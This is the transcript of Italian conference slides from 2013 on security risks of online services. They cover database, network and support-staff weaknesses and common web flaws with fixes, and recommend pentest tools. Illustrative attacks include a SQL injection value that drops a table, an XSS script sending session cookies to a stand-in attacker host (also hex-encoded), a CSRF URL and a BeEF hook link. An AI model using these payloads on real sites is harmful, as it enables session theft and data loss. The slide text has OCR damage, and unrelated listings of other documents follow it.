Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online. Udine, 30 novembre 2013 alessandro arciero

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online. Udine, 30 novembre 2013 alessandro arciero arxway@me."

Transcript

1 Gli aspe) fondamentali della sicurezza informa4ca per servizi eroga4 online Udine, 30 novembre 2013 alessandro arciero 1

2 Premessa L argomento tra/ato è vas2ssimo e per essere affrontato nella sua interezza richiederebbe dei tempi incompa2bili con quelli messi a disposizione dall evento. Pertanto sarà presentata una carrellata delle maggiori cri2cità riscontrate personalmente nell di security assessment rispe/o ad archite/urali e implementa2vi dell infrastru/ura con par2colare approfondimento sulla parte socware di frontend dei servizi. 2

3 Premessa Gli argomen2 tra/a2 valgono ovviamente in qualsiasi contesto ma diventano maggiormente cri2ci in scenari dove l azienda offre servizi online (principalmente e- commerce) per i seguen2 mo2vi: 1) l azienda espone più o meno dire/amente i propri da2 finalizza2 al compimento del business o del servizio 2) Acquisisce maggiore visibilità e diventa un target appe2bile 3) Si dota di una stru/ura di supporto e/o customer service che essendo, per sua natura, un di relazioni umane, rappresenta un fa/ore di rischio molto cri2co. 3

4 Sicurezza. Anche il conce/o di sicurezza è molto esteso in questo contesto si intendono problema2che rela2ve a: Perdita del dato Furto del dato Alterazione del dato Mancata disponibilità del dato. Il conce/o di dato è volutamente generico. Per intenderci con un esempio, un defacement di un sito web è un alterazione. L impossibilità di accedere ai da2 a causa di latenze prolungate introdo/e da problema2che di networking o socware, per esempio, è una indisponibilità del dato. 4

5 Sicurezza. Conseguenze dire/e: Perdite economiche più o meno direje e proporzionate all en4tà del danno Conseguenze in ambito penale (es: Il D.Lgs 196/2003) Perdita di reputazione 5

6 Base da2: cri2cità più frequen2 1. Accesso dire/o al database aziendale da parte del socware che eroga il servizio. Eventuali problema2che di qualsiasi natura si ripercuoto sulla base da2 fondamentale. 2. Aggiornamento sincrono della base da2 tra il database posto online e quello interno aziendale. Stesse problema2che del punto precedente anche se generalmente mi2gate. 3. Esposizione di informazioni oltre le reali necessità. Esponendo, spesso per comodità o pigrizia, intere tabelle contenen2 anche da2 non stre/amente necessari. 4. Mancanza di meccanismi transazionali che rende la base da2 par2colarmente vulnerabile ad a/acchi DoS che possono causare la perdita di consistenza del DB.. (es: myisam storage engine in mysql) 5. Informazioni più cri2che (es: password) non cifrate o cifrate senza salt adegua2 (facilmente aggredibili perciò con tecniche brute force, per esempio mediante l uso di rainbow table) 6

7 Base da2: cri2cità più frequen2 6. Password di accesso deboli 7. Eccesso di privilegi nel concedere autorizzazioni agli uten2 che accedono alla base da2 8. Accessi trusted incondiziona2 ad utenze locali Più nel dejaglio L integrità dei da2 è garan2ta solo dal socware di ges2one e non da meccanismi interni del DB (integrità referenziale ) Errori di design e/o archite/ura della stru/ura da2 associa2 ad errori nelle query di interrogazioni. 7

8 Base da2: cri2cità più frequen2 10. Conservazione di da4 senza ojemperare alle norme di legge e/o raccomandazioni. (PCI- DSS, Il D.Lgs 196/2003 ) 11. MANCANZA DI PIANI DI BACKUP E DISASTER RECOVERY SERI! 8

9 Networking: cri2cità più frequen2 Mancato o insufficiente isolamento tra le risorse che forniscono i servizi e il resto della stru/ura (stesso dominio di broadcast, traffic filtering insufficiente o assente). Mancata solidità dei collegamen2 tra le componen2 che cos2tuiscono il servizio, sopra/u/o tra: Tra istanze di database distribui2 che scambiano da2 tra developer/sys admin e la stru/ura (connessioni non cifrate, port forwarding non sele)vi ) In presenza di prote/e (VPN) spesso vengono permessi meccanismi di split tunneling 9

10 Networking: cri2cità più frequen2 Un aspe/o rilevante spesso so/ovalutato è la mancata configurazione degli appara2 di networking per garan2re (riservare) una banda minima tra le en2tà di controllo e ges2one del servizio e il servizio stesso. E frequente, durante a/acchi DoS miran2 sopra/u/o a impedire la fruizione del servizio tramite flood del canale di comunicazione, che un intera stru/ura rimanga isolata per ore senza poter intervenire e conoscere l in a/o! 10

11 Audi2ng, logging. Sebbene l argomento sia vasto e richieda ben altro approfondimento è necessario riportare come molte delle problema2che nascano da una mancato controllo dell ad ogni livello delle componen2 che erogano il servizio. Spesso manca anche la più basilare raccolta (!!!!) e analisi dei log. Senza addentrarsi a fondo, non è ammissibile che non vengano considera2 ai fini della sicurezza gli even2 più rilevan2 come ripetu2 e frequen2 tenta2vi falli2 di: 1. instaurare una VPN 2. accedere ad un area prote/a del sito 3. effe/uare transazioni di danaro 4. 11

12 di CRM e supporto: cri2cità più frequen2 L interazione tra il personale impiegato e il pubblico fruitore del servizio, in generale rappresenta probabilmente la variabile più difficile da controllare dal punto di vista della sicurezza. fondamentali da seguire e realizzare: Training rigoroso e approfondito di tu/o il personale circa i comportamen2 nella relazione con il cliente e nelle informazioni che possono essere condivise a/raverso i canali messi a disposizione ( , chat ) e sulle tecniche più diffuse di phishing. Spesso il personale tende a riconoscere una certa confidenza all interlocutore abile nell approccio e concedere più del dovuto. 12

13 di CRM e supporto: cri2cità più frequen2 Un sistema robusto di tracking e di iden2ficazione rigorosa dei flussi alla base dei offerta. L ambiguità nell iden2ficare e definire o step del flow del business facilita gli errori degli operatori. Sistemi robus2 E VELOCI per l iden2ficazione del cliente. (per esempio l accesso ad una chat di supporto deve essere auten2cata). Addestramento circa l u2lizzo degli strumen2 fondamentali e sui comportamen2 da tenere: u2lizzo corre/o del browser, del client di posta. 13

14 ERRORI DELLE CONFIGURAZIONI dei socware server / client Un problema rilevante è quello della configurazione degli applica2vi server e client. Mol2 delle vulnerabilità a cui è esposto il servizio sono effe/o dire/o di errori di configurazione, per esempio del web server. Talvolta errori del socware che implementa le interfacce o la logica sono sfru/abili grazie ad errori determina2 dall sistemis2ca. Nell analisi più approfondita che segue si evidenzieranno alcuni casi tra i più diffusi. 14

15 ERRORI DELLE CONFIGURAZIONI dei socware server / client Un altro aspe/o importante è quello dell di SEO (Search Engine Op2miza2on). Talvolta l di del sito impone delle configurazioni complesse che possono nascondere degli errori che portano a vulnerabilità. L uso del modulo mod_rewrite di apache per la riscri/ura degli URL dopo cambiamen2 più o meno radicali della stru/ura del sito (allo scopo di mantenere ranking al2 nelle indicizzazioni di google per esempio) possono introdurre delle vulnerabilità molto pericolose. 15

16 CRITICITA : IL FRONTEND WEB Le maggiori problema2che so/o l aspe/o della sicurezza arrivano da errori socware provenien2 dal versante del frontend web. In par2colare, la mancata sani2zzazione e validazione dei da2 di INPUT, rappresentano in assoluto le maggiori minacce a tu/e le online. A tal proposito saranno riportate le TOP 10 vulnerabili2es OWASP (Open Web Applica2on Security Project). 16

17 DEVELOPMENT: SQL injec2on E ancora oggi la principale tecnica di successo per carpire informazioni dai database dei servizi offer2. La tecnica consiste nell inie/are codice SQL nelle normali query di servizio. Il risultato può arrivare al completo controllo di tu/o il database. $numero_righe_per_pagina = $_GET[ nextpage ]; $sql_query= SELECT * FROM tbl_prodotti OFFSET. $numero_righe_per_pagina; La variabile nextpage non è ges4ta. Questo perme/e di appendere una qualsiasi query a quella di selezione. 17

18 DEVELOPMENT: SQL injec2on Per esempio alla variabile nextpage viene assegnato il seguente valore : 50; DROP table tbl_users; 50 sono il numero di righe per pagina da visualizzare ; chiude la query DROP TABLE users; è la query inie/ata il cui esito è prevedibile. Dopo l injec2on la query diventa: SELECT * FROM tbl_prodotti OFFSET 50; DROP TABLE tbl_users; 18

19 DEVELOPMENT: cookie e sessioni La quasi totalità delle aree riservate utilizza dei cookie per creare delle sessioni autenticate. Il cookie viene inviato al client settando fondamentalmente i seguenti parametri: domain: il dominio per il quale il cookie è valido. path: il path sul server che viene interessato dal cookie expiration: il tempo di validità e quindi di durata della sessione (generalmente fino alla chiusura del browser) flag: tra cui il più importante è HTTPONLY. Tale flag è molto importante poiché se settato non permette a codice javascript di leggere il valore del cookie mitigando il pericolo di molti attacchi. 19

20 DEVELOPMENT: cookie e sessioni Domain, path devono essere molto conservativi per circoscrivere al massimo l ambito di utilizzo e limitare i rischi, soprattutto su server non dedicati. Il flag HTTPONLY deve essere settato per limitare l efficacia alcuni attacchi classici molto diffusi. (es: furto di cookie di sessione attraverso tecniche che saranno illustrate in seguito) 20

21 DEVELOPMENT: XSS XSS (cross site scrip2ng) è una tecnica che perme/e di inserire codice html/javascript all interno di una pagina web e di poter eseguire tale codice sul client. L origine del problema è sempre la mancata sani2zzazione di un dato di INPUT. La vulnerabilità è localizzata sul server benchè il danno causato si ripercuota sul client. Questa vulnerabilità, a differenza dell SQL injec2on, per o/enere successo necessità della collaborazione dell utente che visita il sito. L a/accante induce la a cliccare su un link che porta al sito nascondendo però al suo interno il codice che verrà eseguito sul client. 21

22 DEVELOPMENT: XSS La funzionalità di ricerca dei contenu2 in un sito rappresenta il caso classico. Il risultato della ricerca è preceduto, nella visualizzazione nella pagina di risposta, della chiave di ricerca u2lizzata. Se la chiave di ricerca è del codice e non è sani2zzato, verrà eseguito sul browser. Si consideri, per esempio, di u2lizzare come chiave di ricerca a la seguente stringa: <script> var img = new Image(); img.src= "http://www.attaccante.com/show_cookie.php?cookie=" + document.cookie </script> Il client della tenta di caricare l immagine dal sito a/accante.com che riceve via GET la variabile cookie= con il valore del cookie, potenzialmente di una sessione auten2cata sul sito affe/o. (A/acco efficace se il flag HTTPONLY del cookie non è se/ato) 22

23 DEVELOPMENT: XSS Gli step dell a/acco: 1) L a/accante induce la a cliccare un url sul server vulnerabile passando la variabile di ricerca con del codice javascript. Es: h/p://www.sitovulnerabile.com?search=<script> var img = new Image(); img.src= "http://www.attaccante.com/show_cookie.php?cookie=" + document.cookie </script> L url può essere mascherato opportunamente codificato (es: hex). L url diventa: h/p://www.sitovulnerabile.com?search= %3C%73%63%72%69%70%74%3E %20%76%61%72%20%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%0B %69%6D%67%2E%73%72%63%3D%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E %61%74%74%61%63%63%61%6E%74%65%2E%63%6F%6D%2F%73%68%6F%77%5F%63%6F%6F%6B %69%65%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%20%2B%20%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%0A%3C%2F%73%63%72%69%70%74%3E%20%0A 23

24 DEVELOPMENT: XSS Gli step dell a/acco: 2) La cliccando sull URL effe/ua una chiamata al sito vulnerabile che può perme/e di effe/uare una richiesta a quello dell a/accante passando con document.cookie la cookie nella variabile cookie passata via GET, magari di una sessione auten2cata sul server vulnerabile). L a/accante, o/enuto il valore del cookie, accede al server vulnerabile con i privilegi di sessione della Questo 4po di ajacco è il più diffuso in assoluto e ha coinvolto storicamente quasi la totalità dei si4 di ecommerce o di servizi a pagamento (amazon, ebay, facebook ). Per esperienza personale 1 sito su 4 ne è afflijo. Spesso gli acquis4 o ricariche di denaro ad account terzi sono sta4 effejua4 materialmente (e inconsapevolmente) dall utente vi)ma. Se il valore di INPUT non validato viene inserito in un database l XSS diventa persistent e non serve nemmeno più passarlo alla vi)ma con tecniche di phishing. 24

25 DEVELOPMENT: XSS REMEDIATION/MITIGATION PLAN I browser moderni in mol2 casi, ma non in riconosco una buona quan2tà di ques2 tenta2vi di a/acco, ma rimangono ancora numerose possibilità di successo. E facile intuire che se la sessione rubata è di amministrazione (supporto, customer service...) il danno può essere fatale. La formazione del personale sul problema e le sue origini, la messa a punto degli strumen2 adegua2, aggiornamento dei browser alle versioni più recen2, se/aggi conserva2vi sulla sicurezza, installazione di plugin come l NETCRAFT (an2 XSS), SONO ASPETTI FONDAMENTALI DA NON TRASCURARE. 25

26 DEVELOPMENT: XST XST (cross site tracing) è una tecnica di XSS che sfru/a un errore di configurazione del web server, ovvero il metodo TRACE abilitato anche su server di produzione, per o/enere, per esempio i cookie di sessione, anche nei casi in cui quest ul2ma è configurata corre/amente (h/ponly flag se/ato) Il metodo TRACE è generalmente u2lizzato a fine di debugging. In pra2ca effe/ua un echo di ritorno al client tu/e le richieste effe/uate al server. Il problema nasce perché il server ritorna nell output anche i valori dei cookie che possono essere tramite l XSS all a/accante. 26

27 DEVELOPMENT: XST Step dell a/acco: 1) l a/accante forgia una pagina web u2lizzando una chiamata XMLH/pRequest() con il metodo TRACE anziché il tradizionale GET. 2) L a/accante induce un visitatore a visitare la pagina web cosi forgiata. 3) La pagina forgiata dell a/accante recupera i valori dei cookie (sessione) dall output del server con il TRACE abilitato e lo invia all a/accante. L a/acco funziona perché anche se il cookie ha il flag HTTPONLY se/ato, il codice javascript recupera il dato dall output del server con il metodo TRACE abilitato. MITIGATION/REMEDIATION PLAN Disabilitare il metodo TRACE! 27

28 DEVELOPMENT: CSRF Cross- Site Request Forgery (CSRF), CWE 3252, è una tecnica che sfru/a il XSS (e non solo) per far eseguire delle operazioni sul server ad una che ha una sessione su un server di interesse dell a/accante. E una tecnica molto insidiosa ed u2lizzata in ogni ambito, compreso social network, chat etc.. L a/accante ricava l url per compiere una determinata operazione di suo interesse (acquistare un prodo/o, effe/uare trasferimento di denaro) e induce una potenziale che ha i privilegi per compiere l operazione, a visitare la pagina indicata dall URL. 28

29 DEVELOPMENT: CSRF Si consideri a 2tolo di esempio il seguente URL: h/p://www.ecommerce.com/trans.php?username=ajacker&ac4on=add&value=100 Che ricarica l utente a/acker di 100. A/acker invia il link alla che avendo la sessione effe/ua l operazione con successo, ricaricandolo. MITIGATION/REMEDIATION PLAN Questo 2po di a/acco può essere evitato inserendo un token che viene con2nuamente scambiato tra server e client. Una chiamata GET o POST che non por2 con se il token non ha successo. Perciò azioni invocate da form o url forgia2 ad hoc vengono ignorate. 29

30 DEVELOPMENT: Unrestricted Upload of File with Dangerous Type Benchè questa vulnerabilità (CWE- 434) sia meno frequente è forse la peggiore. La possibilità di fare un upload di documen2 in una directory sfogliabile (dentro la documentroot del webserver) senza verificare almeno il filetype è una delle situazioni peggiori. L a/accante effe/ua un upload di file eseguibili o script e li esegue. Le conseguenze sono immaginabili. MITIGATION/REMEDETION PLAN Spostare le directory di upload all esterno della documentroot, verificare il filetype (es: png, jpg, pdf ) sono operazioni necessarie. 30

31 DEVELOPMENT: Exposed Dangerous Method or Func2on (CWE- 749). Questa vulnerabilità è figlia della superficialità e della trascuratezza. E abbastanza diffusa sopra/u/o da quando è frequente l uso di Ajax (Asynchronous JavaScript and XML). Accade spesso che script invoca2 solo in chiamate asincrone (ma non solo, mi riferisco al caso più frequente) dal codice vero e proprio che disegna le pagine, non siano opportunamente e quindi sfogliabili senza privilegi da chiunque. Riporto uno script PHP tra/o da un caso reale: useradd.php?user='+user +'&name=' + name + '&surname=' + surname +'; Lo script esterno, incluso da una pagina corre/amente prote/a, era disponibile liberamente, senza alcuna auten2cazione. 31

32 DEVELOPMENT: Informa2on Exposure Through Debugger Informa2ons (CWE- 215). La modalità di debug in produzione può rappresentare una minaccia serissima. Riportare gli errori in un server di produzione può comportare l esposizione di informazioni riguardan2: Percorsi sul file system e stru/ura dello stesso Logica del socware, errori del codice, mancate validazioni e controlli Tipo e versione di socware u2lizzato Stru/ura del database e delle query di interrogazione. 32

33 DEVELOPMENT: Client- Side Enforcement of Server- Side Security (CWE- 602). Spesso l input è validato lato client da codice javascript. Per esempio la forma/azione di date, piu/osto che di indirizzi etc nelle form è un valido ausilio per lo user che le completa MA NON PUO SOSTITUIRE LA VALIDAZIONE LATO SERVER. E un errore comune e devastante. Le stringhe di input passate dall a/accante che rimuove il codice client side sono inserite generalmente as is in un database. Le conseguenze sono immaginabili. Permanet XSS, SQL injec2on. 33

34 DEVELOPMENT: Exposure of Backup File to an Unauthorized Control Sphere (CWE- 530). Un backup periodico (per esempio il dump di un database) viene schedulato e salvato in una directory esposta al browsing. Con tool come DirBuster (h/p://www.owasp.org) è possibile scovare il percorso, il nome e o/enere cosi i da2 di tu/o il database. 34

35 CONSIDERAZIONI FINALI La stragrande maggioranza delle problema2che riscontrate ricade in in quelle presentate. Ecco le 10 OWASP per l anno 2013: 35

36 CONSIDERAZIONI FINALI Una problema2ca trasversale a gli affronta2 è quella dell di SOCIAL ENGINEERING che spesso è l elemento vincente di chi conduce qualsiasi a/acco. Le phishing campaign a/raverso mail o social network possono essere condo/e e automa2zzate su qualsiasi scala a/raverso socware e spesso sono le tecniche che portano i risulta2 migliori poiché manca ancora una cultura e una adeguata preparazione ad approcciare un mondo di servizi offer2 online. Ho personalmente constatato come sia semplice ingannare o indurre in errore chiunque operi nel se/ore a prescindere dalla cultura personale o dall importanza del ruolo svolto. 36

37 CONSIDERAZIONI FINALI Riporto sempre l esempio dei vari sistemi di chat online dire/amente nel browser che si stanno sempre più diffondendo e che vengono u2lizza2 in mol2ssimi contes2, dal supporto prevendita a quello post vendita. IN TUTTI i casi durante l di social engineering come penetra2on tester, sono riuscito ad indurre l operatore a cliccare su un link e a prendere possesso del browser e in alcuni casi di o/enere una shell sul computer dell operatore. 37

38 CONSIDERAZIONI FINALI Per concre2zzare con un esempio quanto riportato, porto ad esempio BEEF (Browser Exploita2on Framework rilasciato so/o licenza GPL h/p://beefproject.com). E sufficiente cliccare su un link apparentemente regolare (nome a parte J ) come il seguente, su cui è installata la parte server di Beef: h/p://a/acker_beef_server/support/index.html per o/enere il controllo del browser della che diventa l inconsapevole ve/ore per l a/acco al server dei servizi. Il server è potenzialmente compromesso. 38

39 CONSIDERAZIONI FINALI La console di controllo di beef Open Source Day, 30 novembre

40 OPENSOURCE TOOLS Gli strumen2 per effe/uare dei security assessment sono mol2 anche se non di immediata fruizione. In mol2 casi un uso acri2co o poco consapevole degli stessi porta a non riconoscere pericoli gravi o a trovarne ovunque (falsi posi2vi). Tale lavoro dovrebbe essere fa/o da un professionista almeno con periodicità annuale o dopo importan2 cambiamen2 nella stru/ura che eroga il servizio, tu/avia delle verifiche periodiche effe/uate da personale con un minimo di preparazione possono almeno riconoscere e scovare le minacce più gravi. Esistono versioni commerciali di tools che offrono interfacce semplificate e automa2smi molto comodi ma in ambito free o opensource si trovano degli strumen2 fondamentali e molto poten2. 40

41 OPENSOURCE TOOLS E evidente che il corre/o funzionamento di tu/o l apparato erogante il servizio dipende da i fa/ori in gioco: design, proge/azione, implementazione. Tu/o ciò vale per la parte sistemis2ca di internetworking e di sviluppo del codice. Tu/avia l u2lizzo di strumen2 di diagnos2ca rappresentano una opportunità di valutare il lavoro eseguito e andrebbero sempre prima di entrare in produzione con l Un altro aspe/o fondamentale è la maggiore consapevolezza e conoscenza che ogni player coinvolto nell acquisisce a/raverso questo 2po di 41

42 OPENSOURCE TOOLS Oltre ai tools già menziona2, segnalo: hjps://www.owasp.org/index.php/main_page Il sito fondamentale. Vi si trovano cen2naia di tools, alcuni di assoluto valore. Distribuzione Backtrack (h/p://www.backtrack- linux.org)include migliaia di tool mol2ssimi dei quali rilascia2 so/o licenza BSD o GPL. W3af Web Applica2on A/ack and Audit Framework (h/p://w3af.org) rilasciata so/o licenza GPLv2. E uno strumento insos2tuibile, presenta una interfaccia grafica so/o varie pia/aforme. Effe/ua dei test per mol2ssime vulnerabilità. Aggiornato tramite plugin e uno degli strumen2 principe dei pentester. 42

43 OPENSOURCE TOOLS Principali tools consiglia2 per l analisi: Sqlmap (h/p://h/p://sqlmap.org). Riferimento per scovare le vulnerabilità di SQL injec2on. (GPLv2) Xeno4x (h/ps://www.owasp.org/index.php/owasp_xeno2x_xss_exploit_framework) Strumento fondamentale per scovare vulnerabilità di cross site scrip2ng 43

44 CONCLUSIONI dei servizi online e creare una stru/ura adeguata per ges2rli è un compito complesso e difficile, sopra/u/o so/o il profilo della sicurezza. A prescindere dalle scelte tecnologiche (argomento importante ma al di fuori dello scopo dell intervento) effe/uate, è necessario una pianificazione me2colosa di ogni fase. Spesso invece, sopra/u/o nel caso dell e- commerce, l approccio virtuale al business reale viene visto come un alterna2va meno impegna2va dello store fisico. Se è probabilmente vero so/o alcuni non lo è so/o quello dell inves2mento in termini di competenze, pianificazione. La sicurezza è un aspe/o spesso trascurato e la possibilità di subire danni è percepito come un evento remoto e improbabile. 44

45 CONCLUSIONI La consapevolezza si acquisisce purtroppo solo a danno avvenuto. A volte basta una piccola dimen2canza, un errore apparentemente insignificante per esporre una vulnerabilità che non inficia dire/amente la funzionalità e la regolarità del servizio ma che è sufficiente, per fare un esempio, a far finire il sito nella black list di google fermando di fa/o qualsiasi anche per giorni. 45

46 DOMANDE? GRAZIE 46

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Un contesto dinamico in con-nua evoluzione

Un contesto dinamico in con-nua evoluzione Un contesto dinamico in con-nua evoluzione Il se3ore bancario è un target par*colarmente appe-bile per i cybercriminali, per molteplici finalità So3razione denaro dai con* delle vi9me So;razione e divulgazione

Dettagli

Esempio Cookie Policy

Esempio Cookie Policy Esempio Cookie Policy INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cascinaladoria.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

Progetto NAC (Network Access Control) MARCO FAGIOLO

Progetto NAC (Network Access Control) MARCO FAGIOLO Progetto NAC (Network Access Control) MARCO FAGIOLO Introduzione Per sicurezza in ambito ICT si intende: Disponibilità dei servizi Prevenire la perdita delle informazioni Evitare il furto delle informazioni

Dettagli

Gli strumen, social e l usabilità al servizio della scuola. Da MatchPoint a La Buona Scuola

Gli strumen, social e l usabilità al servizio della scuola. Da MatchPoint a La Buona Scuola Gli strumen, social e l usabilità al servizio della scuola Da MatchPoint a La Buona Scuola premessa Social media: tecnologie online che le persone u7lizzano per interagire e condividere contenu7 Potenzialmente

Dettagli

Soluzioni e Proge-! Datakey Software Engineering Srl 1

Soluzioni e Proge-! Datakey Software Engineering Srl 1 Soluzioni e Proge- 1 Datakey 30 anni di SoSware Datakey nasce Nel 1985, avente ad ogge0o l a2vità di proge0azione di servizi informa:ci opera trasformazioni orientate alla crescita; E cer:ficata ISO 9001

Dettagli

Indice. Introduzione. PARTE PRIMA PHP: i fondamenti 1

Indice. Introduzione. PARTE PRIMA PHP: i fondamenti 1 Indice Introduzione XV PARTE PRIMA PHP: i fondamenti 1 Capitolo 1 Perché PHP e MySQL? 3 1.1 Cos è PHP? 3 1.2 Cos è MySQL? 4 1.3 La storia di PHP 5 1.4 La storia di MySQL 6 1.5 Le ragioni per amare PHP

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Informativa estesa sull uso dei Cookie Policy

Informativa estesa sull uso dei Cookie Policy Informativa estesa sull uso dei Cookie Policy Proteggere la sicurezza e la privacy dei vostri dati personali è importante per questo sito, che agisce in conformità con le leggi attualmente in vigore sulla

Dettagli

Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali

Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali Come o2enere più Clien5, più Soldi e più Libertà nel tuo business di Consulente: Processi ed esempi reali Benvenuto nel webinar! www.acquisireclien5.com O2enere più traffico: come portare alle tue pagine

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Fenice Newsle er La nuova versione 6.0.01.01 #1 - Fa ura di interessi per ritardato pagamento Genera fa ura di interessi

Fenice Newsle er La nuova versione 6.0.01.01 #1 - Fa ura di interessi per ritardato pagamento Genera fa ura di interessi Spe.le Cliente, noi di SEI - Servizi Informaci siamo molto lie (e un po orgogliosi) di iniziare la pubblicazione di questo noziario, denominato Fenice Newsleer, entro il quale troverete le ulme novità

Dettagli

Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui

Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui Vincenzo Gunnella Notaio Angelo Peppetti - ABI Organo collegiale Mutui Conncet 1 dicembre 2014 Ø La collaborazione ABI

Dettagli

Product Overview. ITI Apps Enterprise apps for mobile devices

Product Overview. ITI Apps Enterprise apps for mobile devices Product Overview ITI Apps Enterprise apps for mobile devices ITI idea, proge2a e sviluppa apps per gli uten6 business/enterprise che nell ipad, e nelle altre pia2aforme mobili, possono trovare un device

Dettagli

IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI. Ing. Andrea Giaconi

IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI. Ing. Andrea Giaconi IL VALORE DEL CLIENTE NELLA GESTIONE DEI PROCESSI AZIENDALI Ing. Andrea Giaconi Il cliente chi è? È il giudice ul=mo della mia impresa Stringe relazioni Il suo comportamento varia nel tempo Per ges=rlo

Dettagli

MANUALE INTRODUTTIVO

MANUALE INTRODUTTIVO MANUALE INTRODUTTIVO Scaricamento da internet e installazione Fenice è liberamente disponibile su internet, all indirizzo h#p://www.fenicex.it/downloads.html, cliccando sul pulsante Download posto sulla

Dettagli

Informativa estesa sull utilizzo dei cookie

Informativa estesa sull utilizzo dei cookie Informativa estesa sull utilizzo dei cookie che Gli OPTIMA utenti visiona S.R.L. vedranno le pagine utilizza inserite del i Cookie sito. delle per quantità rendere minime i propri informazioni servizi

Dettagli

INFORMATIVA ESTESA SULL USO DEI COOKIE

INFORMATIVA ESTESA SULL USO DEI COOKIE INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cantiwinestyle.com o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di cantiwinestyle.com

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Indice generale. Il BACK-END...3 COME CONFIGURARE JOOMLA...4 Sito...4 Locale...5 Contenuti...5

Indice generale. Il BACK-END...3 COME CONFIGURARE JOOMLA...4 Sito...4 Locale...5 Contenuti...5 Guida a Joomla Indice generale Il BACK-END...3 COME CONFIGURARE JOOMLA...4 Sito...4 Locale...5 Contenuti...5 Il BACK-END La gestione di un sito Joomla ha luogo attraverso il pannello di amministrazione

Dettagli

Django - WebSocket. Web in real- 3me. Saverio Patruno ConoscereLinux - LUG Modena. #linuxdaymo15

Django - WebSocket. Web in real- 3me. Saverio Patruno ConoscereLinux - LUG Modena. #linuxdaymo15 Django - WebSocket Web in real- 3me Saverio Patruno ConoscereLinux - LUG Modena #linuxdaymo15 Python Anni 90 Guido van Rossum per hobby crea un linguaggio di facile comprensione, con curva di apprendimento

Dettagli

Fenice Web. Domande frequen. #6 - Luglio 2015

Fenice Web. Domande frequen. #6 - Luglio 2015 Spe.le Cliente, ecco il sesto numero di questo noziario. Questo noziario verrà spedito automacamente a tu i Clien di Fenice. Se qualcuno desidera NON riceverlo deve semplicemente comunicare la propria

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Come creare un certificato SSL per IIS utilizzando la CA Privata di W indow s 2 0 0 3 Server

Come creare un certificato SSL per IIS utilizzando la CA Privata di W indow s 2 0 0 3 Server Come creare un certificato SSL per IIS utilizzando la CA Privata di W indow s 2 0 0 3 Server Di Massimiliano Brolli, Roma 24/10/2004 SSL permette di eseguire una connessione criptata tra un Server WEB

Dettagli

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28 Indice 25 184 Introduzione XI Capitolo 1 Impostazione dell ambiente di sviluppo 2 1.1 Introduzione ai siti Web dinamici 2 1.2 Impostazione dell ambiente di sviluppo 4 1.3 Scaricamento di Apache 6 1.4 Installazione

Dettagli

